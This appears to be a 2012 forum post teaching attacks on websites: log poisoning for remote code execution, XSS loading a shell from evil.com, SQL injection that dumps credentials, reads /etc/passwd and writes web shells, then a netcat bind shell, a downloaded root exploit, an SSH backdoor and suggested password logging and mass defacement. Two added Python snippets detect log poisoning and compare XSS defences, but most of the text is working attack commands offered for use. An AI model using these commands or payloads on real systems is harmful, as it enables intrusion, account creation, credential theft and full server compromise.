 WEB hkng tutorial

Author: Admin
Posts: 117
Join date: 2011-04-25
Subject: WEB hkng tutorial   Posted Fri Feb 03, 2012 1:58 am

I cover most methods in this tutorial, but you are guaranteed to learn something new. Just take a glance at each section!

Methods Covered:

■RCE P1/P2
■XSS
■SQL P1/P2/P3
■Rooting

-- RCE //

RCE: Remote Code Execution
Definition: we use this attack to run code of our choosing on the server, in the server's own language (in our case, PHP). We can download files, make directories, remove directories; overall, just a load() of fun.

This attack is essentially a shell execution backdoor: if you find a site that is vulnerable to it, chances are you will get full control of the web application and, usually, of the account the web server runs as.

This attack can be carried out through Netcat or telnet; today we will be discussing the whereabouts and how-to's of telnet.

Starting off, we are going to connect to our target; the site's IP address can be found with ping. Once we have it, we head over to the command prompt and type the following (127.0.0.1 stands for the target's address):

telnet 127.0.0.1 80

"Why port 80?" We connect to port 80 because that is where the web server, and therefore the vulnerable script, listens. Everything we send to it, valid or not, also ends up in the web server's access log, and that is what the rest of this section relies on.

Now we send a GET request for the vulnerable script (bak.php?page=) with our PHP code in the parameter. The response to this request does not matter; the point is that Apache writes the raw request line into its access log, PHP tag and all. For testing purposes, we use a simple system() call whose command comes from a second parameter:

Code:
GET /bak.php?page=<?php system($_GET['foo']); ?>
Press Enter twice to finish the request. We send it by hand through telnet rather than from a browser because a browser would percent-encode the <, ?, spaces and quotes; the encoded form would be logged instead and would never be parsed as PHP.

Once that line is in the log, every request that makes bak.php include the log file executes system($_GET['foo']), so "foo" is our backdoor into the website: whatever we put in foo runs as the web server's user. If it is a standard Linux box, you can use something like this to make an account:

Code:
useradd foo
passwd foo
(passwd prompts interactively, so the second line only works from a real terminal, not through system().)

But we are going to set our focus on poisoning the Apache logs and executing commands through our variable (a parameter we control). We know the current box is running Windows, so our command syntax will use net user. Let's begin:

Code:
localhost/bak.php?page=../../apache/logs/access.log&foo=net%20user%20AliEmre%20password%20/add
What we do here is include the poisoned log file through the page= parameter (the ../../ climbs out of the web root to the Apache logs directory; adjust the depth to the target's layout). PHP executes the logged tag, which reads our foo variable and runs it as a command. Now you're probably thinking, "How do I know if the account is actually there?" You can use net user username, for example:

Code:
localhost/bak.php?page=../../apache/logs/access.log&foo=net%20user%20foo
If you get Windows account details back, you were successful! But now you're thinking, "I want to access this!" Here is how:

1 ) Contact the webmaster via the contact feature
2 ) Tell him about an invalid package or a broken application
3 ) Link him to http://gnuwin32.sourceforge.net/packages/wget.htm or your own uploaded wget package
4 ) IF he installs it on the right machine, you can now begin your attack!
5 ) Run dir through the backdoor: localhost/bak.php?page=../../apache/logs/access.log&foo=dir
6 ) Move up the directory tree (dir ..) until you find the directory that lists all the hosted domains; once found, go into the domain's public_html or ~www directory
7 ) Once you are in the web root, wget an infected program or a PHP shell (an infected program requires talking the admin into running the file)
8 ) Once your shell is in place, go to localhost/shellname.php

Trying to infect the admin is more of a long shot, though; if it works you get everything the administrator has: hosting accounts, email addresses, WAP key / PPPoE modem GUI access, and so on.

-- RCE P2 //

If you want to deliver this attack straight from the web browser, this is for you. Once again, our vulnerable parameter is /bak.php?page=, so we put our PHP syntax into it. In this case we simply try to get an "echo" response from the web server:

Code:
localhost/bak.php?page=<?php echo "foo"; ?>
We get no response from the server ] :, our best guesses are:

1 ) The script runs our input through escapeshellcmd()
2 ) magic_quotes_gpc = On, which backslash-escapes the quotes in our string
3 ) PHP tags or special characters are filtered (if this is in play, the script only ever sees something like php echo foo, so we are not making a proper request, just an invalid query)

But there is a bypass: URL-encode the payload so that the special characters are not visible to a filter looking at the raw request:

Code:
localhost/bak.php?page=%3C%3Fphp%20echo%20%22deneme%22%3B%20%3F%3E
This is the same tag as before (with "deneme" as the text), just percent-encoded. It works against filters that look at the raw URL for <, ? or quotes, because the web server and PHP decode the percent-escapes before the value reaches the script: the script sees the plain tag while the filter never saw a special character. Two caveats: a filter that runs after decoding, inside the script itself, is not fooled by this; and for the log-poisoning method above, encoding is counterproductive, because Apache logs the request line exactly as received, so an encoded tag in the log is never parsed as PHP. One more tell: when you make an invalid request to a filtered/patched site, the error page sometimes echoes the encoded fragments back (%3C, %80 and so on), which shows you where your input lands.
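As an added example (not code from the original post), here is the detection side of both RCE sections: a small Python script that parses Apache combined-format access log lines, percent-decodes the request, referer and user-agent fields (repeatedly, so double encoding does not hide anything), and flags logged PHP tags (the poisoning step from part 1) and directory traversals that reach a log file (the include step). The log lines are constructed for the example; bak.php and the page= parameter follow the post. Each finding also records whether a filter that only looked at the raw, still-encoded text would have fired, which is exactly the gap the URL-encoding trick in part 2 exploits.

```python
"""Spot log-poisoning and log-include attempts in Apache access logs.

Added example, not code from the original post. The log lines are
constructed; bak.php and page= follow the post's own examples.
"""
import re
from urllib.parse import unquote

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A PHP open tag anywhere in a logged field turns the log into a PHP file in waiting.
PHP_TAG = re.compile(r'<\?(php\b|=)', re.IGNORECASE)
# A traversal that ends in a web-server log is the include half of the attack.
LOG_INCLUDE = re.compile(r'(\.\./|\.\.\\).*(access|error)\.log', re.IGNORECASE)

# Constructed sample: one benign hit, the post's telnet request, the post's
# Windows "net user" command, the post's percent-encoded tag, a double-encoded
# traversal, and a tag smuggled in through the User-Agent header.
SAMPLE_LOG = r'''
10.0.0.5 - - [03/Feb/2012:01:58:00 +0000] "GET /bak.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [03/Feb/2012:01:58:10 +0000] "GET /bak.php?page=<?php system($_GET['foo']); ?>" 400 226 "-" "-"
10.0.0.9 - - [03/Feb/2012:01:58:20 +0000] "GET /bak.php?page=../../apache/logs/access.log&foo=net%20user%20foo%20password%20/add HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [03/Feb/2012:01:58:30 +0000] "GET /bak.php?page=%3C%3Fphp%20echo%20%22deneme%22%3B%20%3F%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [03/Feb/2012:01:58:40 +0000] "GET /bak.php?page=%252e%252e%252f%252e%252e%252fapache%252flogs%252faccess.log HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [03/Feb/2012:01:59:00 +0000] "GET /index.php HTTP/1.1" 200 100 "-" "<?php system($_GET['c']); ?>"
'''


def fully_decode(value, max_rounds=3):
    """Percent-decode until the string stops changing, so that
    %252e%252e%252f (double-encoded ../) is seen for what it is."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze(log_text):
    """Return one finding per suspicious field. 'caught_raw' says whether the
    same pattern applied to the undecoded text would also have fired."""
    findings = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for field in ("req", "ref", "ua"):
            raw = m.group(field)
            decoded = fully_decode(raw)
            for rule, pattern in (("php-tag", PHP_TAG), ("log-include", LOG_INCLUDE)):
                if pattern.search(decoded):
                    findings.append({
                        "ip": m.group("ip"),
                        "field": field,
                        "rule": rule,
                        "decoded": decoded,
                        "caught_raw": bool(pattern.search(raw)),
                    })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        flag = "" if f["caught_raw"] else "  (missed by a raw-string filter)"
        print(f"{f['ip']} {f['rule']:<11} in {f['field']}: {f['decoded']}{flag}")
```

Run against the sample, the encoded echo tag and the double-encoded traversal are the two hits a raw-string filter would have missed; the telnet request is caught either way, which is also why the post sends it unencoded: an encoded tag in the log would be useless to the attacker.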

-- XSS //

XSS: Cross Site Scripting (X=cross, S=site, S=scripting)
Definition: this is usually a client-side attack, but if it is embedded in the page source (persistent XSS and/or XSS shells) it can do lasting damage to your website and its users.

What we do with this attack is run our own JavaScript inside the site's pages, in the victim's browser, so for example if we wanted Bob's user agent information, we could use our very own XSS shell to gather not only the user agent but his cookies too!

Starting off, if you want to identify vulnerable parameters quickly, inject a marker such as <XSS and view the page source to see where it landed: if it comes back as <XSS the characters went through untouched, if it comes back as &lt;XSS your request was HTML-encoded, i.e. filtered. All you really have to do is look for the finalized result, which in our case was <script>alert("XSS");</script>

But this doesn't stop some people; some sites have basic filters such as:

1 ) Character filtering (<script src, etc. removed)
2 ) <script> or any other JavaScript-related tag blocked
3 ) Character(s) escaped

With a simple URL encode we can sometimes bypass such a filter, for example:

Code:
localhost/search.php?res=%3Cscript%3Ealert(%22XSS%22)%3B%3C%2Fscript%3E
Our request is encoded, but the web server decodes it before handing the parameter to the script, so the page still receives the plain tag. This only beats filters that inspect the raw URL (a URL blacklist or a proxy rule); a filter that runs on the decoded parameter inside the application sees <script> as usual and still blocks it.

If this still doesn't work, it is probably frustrating you, but you could try an img src that carries your JavaScript, for example:

Code:
<IMG SRC="javascript:alert('XSS')">
(The javascript: scheme in an image source only executed in old browsers; modern browsers ignore it, but the tag still tells you whether your input reached the page unencoded.)
If the filter works by stripping characters or the literal <script> tag, we can bypass it quite easily because there are alternatives; in this case we will concentrate on successfully including our XSS shell, using a junk attribute so the tag no longer matches a pattern that expects <SCRIPT followed directly by SRC:

Code:
<SCRIPT a=">" SRC="http://evil.com/evil/shell.asp"></SCRIPT>
If the site is vulnerable, this gets embedded in the page source, and every time a victim visits, the shell script runs in their browser and its logs show up on the admin page of your XSS shell.
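As an added example (not code from the original post), this Python script puts the post's four payloads through two versions of a search handler: one that strips a literal <script> tag from the raw query value (the "basic filter" above) and one that decodes the value and HTML-escapes it for the text context. A small parser built on the standard library's HTMLParser then looks at the rendered HTML the way a browser would and counts what could still execute. The handler and payload names are assumptions for the example; the payloads themselves are the ones the post lists.

```python
"""Why a <script> blacklist fails and context-aware escaping does not.

Added example, not code from the original post. The payloads are the ones
the post lists; the search.php?res= handler is modelled by two functions.
"""
import html
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# The post's payloads, as they would appear in the raw query string.
PAYLOADS = {
    "plain": '<script>alert("XSS");</script>',
    "url-encoded": '%3Cscript%3Ealert(%22XSS%22)%3B%3C%2Fscript%3E',
    "img-javascript": '<IMG SRC="javascript:alert(\'XSS\')">',
    "script-attr-trick": '<SCRIPT a=">" SRC="http://evil.com/evil/shell.asp"></SCRIPT>',
}


def serve_blacklisted(raw_value):
    """Vulnerable handler: strips a literal <script> tag from the RAW query
    value, then decodes it and drops it into the page unchanged. This is the
    'basic filter' the post bypasses with URL encoding and tag variants."""
    filtered = re.sub(r'<script>', '', raw_value, flags=re.IGNORECASE)
    return f'<div class="results">Results for {unquote(filtered)}</div>'


def serve_escaped(raw_value):
    """Hardened handler: decode first, then HTML-escape for the text context,
    so <, >, & and both quote characters can never open a tag or attribute."""
    return f'<div class="results">Results for {html.escape(unquote(raw_value), quote=True)}</div>'


class ActiveContentFinder(HTMLParser):
    """Parses rendered HTML as a browser would and records anything that
    could execute: script tags, on* event handlers, javascript: URLs."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append("script tag")
        for name, value in attrs:
            if name.startswith("on"):
                self.hits.append(f"{tag} {name}= handler")
            elif value and value.strip().lower().startswith("javascript:"):
                self.hits.append(f"{tag} {name}=javascript: URL")


def active_content(document):
    """All executable constructs found in an HTML document."""
    finder = ActiveContentFinder()
    finder.feed(document)
    finder.close()
    return finder.hits


def evaluate(payloads=PAYLOADS):
    """For each payload, how many executable constructs survive each handler."""
    return {
        name: {
            "blacklist": len(active_content(serve_blacklisted(raw))),
            "escaped": len(active_content(serve_escaped(raw))),
        }
        for name, raw in payloads.items()
    }


if __name__ == "__main__":
    for name, result in evaluate().items():
        print(f"{name:<18} blacklist filter: {result['blacklist']} hit(s)   html.escape: {result['escaped']} hit(s)")
```

The blacklist stops only the plain payload; the encoded, img and attribute-trick variants all survive it, while the escaped handler neutralizes every one of them without needing to know any of the variants in advance. That is the practitioner's takeaway from this section: encode output for the context it lands in instead of blacklisting input.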

-- SQL Injection //

Definition: SQL injection is commonly used to read the contents of the backend database. From there, if you have the FILE privilege, you can write a shell to disk with INTO OUTFILE, or use load_file() to read files from the server (/etc/passwd for example).

Starting off, we append a ' to the parameter to make the query error out:

Code:
localhost/index.php?page=1'
Be sure the number you attach your ' to is a valid value for that parameter, otherwise you cannot tell an injection error from an ordinary "not found".

If you get an error like:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "/" at line 1
then your input is reaching the query unescaped: the parameter is injectable. What you need to do now is find out the number of columns in the query; you can do this with ORDER BY followed by a -- comment in MySQL:

Code:
localhost/index.php?page=-1 ORDER BY 1-- No Error
localhost/index.php?page=-1 ORDER BY 2-- No Error
localhost/index.php?page=-1 ORDER BY 3-- No Error
localhost/index.php?page=-1 ORDER BY 4-- No Error
localhost/index.php?page=-1 ORDER BY 5-- Error!
This means the query has 4 columns: ORDER BY 5 errors because there is no fifth column to sort on. (The -1 is a value that matches no row, so that later on the row we add with UNION is the only one the page displays.)

Now we need to find which columns are actually displayed on the page; we can do this with UNION ALL SELECT:

Code:
localhost/index.php?page=-1 UNION ALL SELECT 1,2,3,4--
Now you should see some of the numbers 1 to 4 on the page; if you don't, try viewing the source or hovering over images, the values are sometimes inserted into a title, an alt text or a link.

Displayed columns: 2, 1, 3

Now we need to find out the version; we can use column 1, 2 or 3 for this, in this case we will read it from column 2:

Code:
localhost/index.php?page=-1 UNION SELECT 1,@@version,3,4--
The output was 5.0.77. MySQL 5.0 and later have the information_schema database, which lists every table and column, so we can use it to get the table information. If it is running 4.x, you will have to guess (brute force) the table names.

Now we need to list the tables. We can do this with table_name, which returns one table per row, or with group_concat(table_name), which packs all of them into a single string. The difference matters because most pages only display the first row of the result: with plain table_name you see one table at a time (and need LIMIT to page through them), with group_concat you see them all at once. In our case we will use a simple table_name, which tells the database to grab all table_names from information_schema.tables.

Code:
localhost/index.php?page=-1 UNION ALL SELECT 1,table_name,3,4 from information_schema.tables--
Now you should get a response with table names (this also lists MySQL's own system tables; restrict it to the site's database with where table_schema=dbname). Quoting dbname as a string needs ' characters, which magic_quotes or a filter may escape, so instead we write the name as a char() list of ASCII codes, which needs no quotes at all (using dbname as the text):

Code:
localhost/index.php?page=-1 UNION ALL SELECT 1,table_name,3,4 from information_schema.tables where table_schema=char(100,98,110,97,109,101)--

100, 98, 110, 97, 109 and 101 are the ASCII codes of d, b, n, a, m, e. When using a text-to-ASCII converter, be sure to remove the &#'s, ;'s and so on.

That gives us the tables of our database. To get the columns of one of them, the same trick works against information_schema.columns with where table_name=char(...) in place of table_schema. For example, let's say the table we picked came back with:

user_pass
email
msn
aim

To take advantage of this and read from the columns, use this (tablename is the table you picked above; dbname on its own is the database, not a table, so name the table, or write dbname.tablename):

Code:
localhost/index.php?page=-1 UNION ALL SELECT 1,concat(user_pass,0x3a,email),3,4 from tablename--
We use concat to join the strings and 0x3a, the hex code for :, as the separator (again no quotes needed). This is useful when you are in quite large databases, and group_concat(concat(...)) would show every row at once instead of just the first.

SQL Injection -- Part 2

If you want to get a shell up in public_html / the web root / ~www, you can do it using the INTO OUTFILE statement in MySQL:

Code:
localhost/index.php?page=-1 union select 1,'SHELL CONTENTS',3,4 INTO OUTFILE 'prime location'--
The shell's PHP code goes in the 'SHELL CONTENTS' column. It is usually written as a hex literal rather than base64 (0x3c3f706870... for <?php ...), because MySQL writes the column value out verbatim: a hex literal becomes the raw bytes of the file, while base64 would be left undecoded. There are custom-made shells for this you can find online. 'prime location' should be replaced with the full path where you want the file written, inside the web root, and the column count has to match the 4 we found earlier.

This only works if the database user has the FILE privilege, and the MySQL server process must be able to write to that directory.

SQL Injection - Part 3

If you want to read files from the server, you can use load_file(). Example:

Code:
localhost/index.php?page=-1+union+all+select+1,load_file('/etc/passwd'),3,4--
The database user needs the FILE privilege, magic_quotes has to be off (the path is a quoted string), you have to know the full path, and the file must be readable by the MySQL server process.

If quotes are escaped, you can pass the path as a hex value instead:

Code:
localhost/index.php?page=-1+union+all+select+1,load_file(0x2F6574632F706173737764),3,4--
0x2F6574632F706173737764 is /etc/passwd in hex; hex values and char() codes bypass a lot of the quote filters webmasters have set!

-- Rooting //

Rooting is probably one of the least discussed hacking techniques. All you ever see on blogs/news nowadays is stolen user accounts, serious infections, etc. Rooting takes you to a whole new level: once you get root you are uid 0 and the whole box is yours; people also sell such access on the black market. It is very serious but not discussed a lot.

Starting off, get a PHP shell up on your victim's site. Now you need a proper shell over a raw socket. Use a port that nothing else on the box is using and that the firewall lets through; port 8080 is usually a good choice. Warning: if you use a reverse (back-connect) shell to your own machine, port forwarding on your side might be required.

Starting off, install netcat for Windows from here:

Code:
http://joncraton.org/files/nc111nt.zip
Unzip all the files into one folder on your desktop or in your documents, then open a command prompt, cd into that folder and run nc.exe from there.

You have two choices: you can use the back-connect feature built into most PHP shells, or you can use the command execution section. I prefer the command execution area, because back-connect is unreliable: the server's firewall will often just block the outbound traffic.

Requirement: you might need a precompiled nc for the victim's platform. Host it on freehostia (or any web host), be sure it is built for *nix or whatever the box is running, then in the command execution area wget it and chmod +x name, where name is only the last part of the URL (so for john4.freehostia/nc you run chmod +x nc).

Once in the command execution area, type in:

Code:
./nc -l -p 8080 -e /bin/sh
This is a bind shell: nc listens on port 8080 on the victim and hands /bin/sh to whoever connects (it needs a netcat built with -e support). Now on your machine (in the command prompt), type in:

Code:
nc VicIP 8080

Once you get your shell spawned, use uname -a;id to find out which kernel and distribution the server runs and who you are. Once you have an idea of the layout and versions, look for a local root exploit for that kernel. Once you find your exploit, use wget to fetch it onto the server, for example:

Code:
wget http://www.evil.com/xpl.c
Now we need to compile it and make sure it is executable; for this we use gcc (to compile the source into a binary) and chmod (to make the binary executable):

Code:
gcc xpl.c -o xpl;chmod +x xpl
gcc xpl.c -o xpl : compiles xpl.c and writes the binary xpl (this requires gcc on the box, which is not a given on a hardened server).
chmod +x xpl : makes the file executable (gcc already does this, so the chmod is only a safeguard).

Once completed, type in:

Code:
./xpl
Once the exploit has run, type whoami to see which user you are; you can also use id to see your uid, your groups, etc. Example:

Code:
uid=0(root) gid=0(root) groups=450(apache)
Now you can add an SSH backdoor (sshdoor) from:

Code:
http://www.pacenoge.org/tool/sshdoor.tar.gz
Usage: ./install passwd port

./install jancok 33

Then open PuTTY:

ssh port: 33, login: root, password: jancok

[root@serv1 ~]# uname -a;id
Linux serv1.sex.com 2.6.18-53.1.13.el5 #1 SMP Tue Feb 12 13:01:45 EST 2008 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@serv1 ~]#

Where can you go from here? You can set up a password logger in the login process to collect passwords, you can set up a Perl script to mass-deface all the sites on the box, and so on. Have fun.